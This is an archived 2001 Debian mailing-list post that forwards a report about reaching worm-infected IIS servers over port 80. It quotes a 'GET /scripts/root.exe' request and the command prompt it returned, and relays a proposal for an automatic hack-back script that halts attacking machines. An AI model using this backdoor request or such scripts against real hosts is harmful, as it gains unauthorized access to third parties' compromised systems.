FW: Careful. This is for information only.

To: <debian-user@lists.debian.org>
Subject: FW: Careful. This is for information only.
From: "Gilger.John" <JGilger@acresgaming.com>
Date: Mon, 6 Aug 2001 09:07:41 -0700
Message-id: <[🔎] C5320323443B4446BF2176DF2475CF1804959C@BEEKER.acresgaming.com>

I don't recommend doing this, but here is a forwarded message

------------ Forwarded Message
------------------------------------------
According to incidents.org, for any machine that hits your webserver
with
XXXXX, you can telnet back to that machine on port 80 and get cmd line
access to that machine:

>> I tried telneting back to a server that had sent the
/default.ida?XXX...
>> Results:
>> 
>> 
>> -----------------------------------------------------
>> GET /scripts/root.exe HTTP/1.0
>>  
>> HTTP/1.1 200 OK
>> Server: Microsoft-IIS/5.0
>> Date: Sat, 04 Aug 2001 20:35:19 GMT
>> Content-Type: application/octet-stream
>> Microsoft Windows 2000 [Version 5.00.2195]
>> (C) Copyright 1985-1999 Microsoft Corp.
>>  
>> c:\inetpub\scripts>
>> -----------------------------------------------------


Amazing!  Someone on /. proposed writing a script that whenever anyone
hits
your web server with XXXX, you automatically connect back and halt the
attacking machine, thus stopping the spread.

------------------------------------------------------------------------
-

Reply to:

Follow-Ups:
- Re: FW: Careful. This is for information only.
  - From: dman <dsh8290@rit.edu>

Prev by Date: Re: dist upgrade potato to woody 2.2 to 2.4 kernel
Next by Date: Re: port forwarding
Previous by thread: Re: package to get exchange mail?
Next by thread: Re: FW: Careful. This is for information only.
Index(es):
- Date
- Thread